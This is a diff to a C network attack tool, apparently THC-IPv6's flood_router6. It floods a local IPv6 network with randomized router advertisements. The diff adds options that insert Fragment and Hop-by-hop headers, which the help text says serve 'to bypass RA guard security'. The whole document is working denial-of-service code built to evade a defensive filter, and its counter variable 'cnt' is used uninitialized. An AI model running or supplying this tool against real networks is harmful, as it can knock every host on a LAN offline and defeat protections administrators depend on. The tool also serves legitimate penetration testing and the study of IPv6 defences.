@@ -13,38 +13,53 @@
 extern int debug;
 
 void help(char *prg) {
-  printf("%s %s (c) 2010 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
-  printf("Syntax: %s [-r] interface\n\n", prg);
+  printf("%s %s (c) 2011 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("Syntax: %s [-r] [-F] [-H] interface\n\n", prg);
   printf("Flood the local network with router advertisements.\n");
-  printf("Use -r to use raw mode.\n\n");
+  printf("-F and -H add Fragment and/or Hop-by-hop header to bypass RA guard security.\n");
+//  printf("Use -r to use raw mode.\n\n");
   exit(-1);
 }
 
 int main(int argc, char *argv[]) {
   char *interface, mac[6] = "";
   unsigned char *routerip6, *route6, *mac6 = mac, *ip6;
-  unsigned char buf[56];
+  unsigned char buf[56], buf2[6];
   unsigned char *dst = thc_resolve6("FF02::1"), *dstmac = thc_get_multicast_mac(dst);
   int size, mtu, i;
   unsigned char *pkt = NULL;
-  int pkt_len = 0;
-  int rawmode = 0;
-  int count = 0;
-  
-  if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0)
+  int pkt_len = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, cnt;
+  thc_ipv6_hdr *hdr = NULL;
+
+  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
     help(argv[0]);
 
-  if (strcmp(argv[1], "-r") == 0) {
-    thc_ipv6_rawmode(1);
-    rawmode = 1;
-    argv++;
-    argc--;
+  while ((i = getopt(argc, argv, "FHr")) >= 0) {
+    switch (i) {
+    case 'r':
+      thc_ipv6_rawmode(1);
+      rawmode = 1;
+      break;
+    case 'F':
+      do_frag++;
+      break;
+    case 'H':
+      do_hop = 1;
+      break;
+    default:
+      fprintf(stderr, "Error: invalid option %c\n", i);
+      exit(-1);
+    }
   }
 
+  if (argc - optind < 1)
+    help(argv[0]);
+
+
   srand(time(NULL) + getpid());
   setvbuf(stdout, NULL, _IONBF, 0);
 
-  interface = argv[1];
+  interface = argv[optind];
   mtu = 1500;
   size = 64;
   ip6 = malloc(16);
@@ -65,9 +80,11 @@ int main(int argc, char *argv[]) {
   routerip6[15] = 0x01;
   memset(route6 + 8, 0, 8);
 
+  memset(buf2, 0, sizeof(buf2));
+
   printf("Starting to flood network with router advertisements on %s (Press Control-C to end, a dot is printed for every 100 packet):\n", interface);
   while (1) {
-  
+
     for (i = 2; i < 6; i++)
       mac[i] = rand() % 256;
     for (i = 2; i < 8; i++)
@@ -79,7 +96,7 @@ int main(int argc, char *argv[]) {
     ip6[14] = mac[4];
     ip6[15] = mac[5];
     memcpy(route6, routerip6, 8);
-    
+
     count++;
     memset(buf, 0, sizeof(buf));
     buf[1] = 250;
@@ -102,6 +119,13 @@ int main(int argc, char *argv[]) {
 
     if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
       return -1;
+    if (do_hop)
+      if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0)
+        return -1;
+    if (do_frag)
+      for (i = 0; i <= do_frag; i++)
+        if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
+          return -1;
     if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff08ffff, buf, sizeof(buf), 0) < 0)
       return -1;
     if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
@@ -109,7 +133,7 @@ int main(int argc, char *argv[]) {
       perror("");
       return -1;
     }
-    
+
     pkt = thc_destroy_packet(pkt);
     usleep(1);
     if (count % 100 == 0)
